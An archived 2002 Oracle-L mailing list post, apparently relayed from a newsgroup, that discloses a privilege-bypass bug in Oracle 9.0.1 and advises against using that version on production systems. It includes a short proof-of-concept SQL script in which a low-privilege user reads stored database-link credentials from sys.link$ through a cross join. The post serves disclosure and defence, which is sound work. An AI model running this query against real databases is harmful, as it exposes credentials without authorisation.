| Oracle FAQ | Your Portal to the Oracle Knowledge Grid | |
 |
 | |||
| Oracle FAQ | Your Portal to the Oracle Knowledge Grid | |
|
| |||
Home -> Community -> Mailing Lists -> Oracle-L -> RE: Security Hole
I forwarded it to SANS.
Regards,
Patrice Boivin
Systems Analyst (Oracle Certified DBA)
Systems Admin & Operations | Admin. et Exploit. des systèmes Technology Services | Services technologiques Informatics Branch | Direction de l'informatique Maritimes Region, DFO | Région des Maritimes, MPO
E-Mail: boivinp_at_mar.dfo-mpo.gc.ca
-----Original Message-----
Sent: Tuesday, April 16, 2002 8:33 AM To: Multiple recipients of list ORACLE-L Subject: Security Hole
This just in from comp.databases.oracle.server.
See metalink bug 2121935.
Using ANSI syntax joins (CROSS JOIN, LEFT OUTER etc) allows you to view data from tables on which you have no privilege. For example, try this COMPLETE script:
connect / as sysdba
create user us1 identified by us1;
grant create session to us1;
connect us1/us1
select userid, password
from
sys.link$ cross join dual
;
Worse still, if you have the privilege to create views then this loophole allows you to seek and destroy ANY DATA in the database that you might want to.
The bug is fixed in 9iR2. I didn't see any note about a backport, or a security alert on OTN.
Conclusion:
9.0.1 should not be in use on production system until Oracle supplies a fix.
Jonathan Lewis
http://www.jlcomp.demon.co.uk
Author of:
Practical Oracle 8i: Building Efficient Databases
Next Seminar - Australia - July/August
http://www.jlcomp.demon.co.uk/seminar.html
Host to The Co-Operative Oracle Users' FAQ http://www.jlcomp.demon.co.uk/faq/ind_faq.html
--
Please see the official ORACLE-L FAQ: http://www.orafaq.com
--
Author: Jonathan Lewis
INET: jonathan_at_jlcomp.demon.co.uk
Fat City Network Services -- (858) 538-5051 FAX: (858) 538-5051 San Diego, California -- Public Internet access / Mailing Lists --------------------------------------------------------------------To REMOVE yourself from this mailing list, send an E-Mail message to: ListGuru_at_fatcity.com (note EXACT spelling of 'ListGuru') and in the message BODY, include a line containing: UNSUB ORACLE-L (or the name of mailing list you want to be removed from). You may also send the HELP command for other information (like subscribing).
Fat City Network Services -- (858) 538-5051 FAX: (858) 538-5051 San Diego, California -- Public Internet access / Mailing Lists --------------------------------------------------------------------To REMOVE yourself from this mailing list, send an E-Mail message to: ListGuru_at_fatcity.com (note EXACT spelling of 'ListGuru') and in the message BODY, include a line containing: UNSUB ORACLE-L (or the name of mailing list you want to be removed from). You may also send the HELP command for other information (like subscribing). Received on Tue Apr 16 2002 - 09:43:28 CDT
 |
 |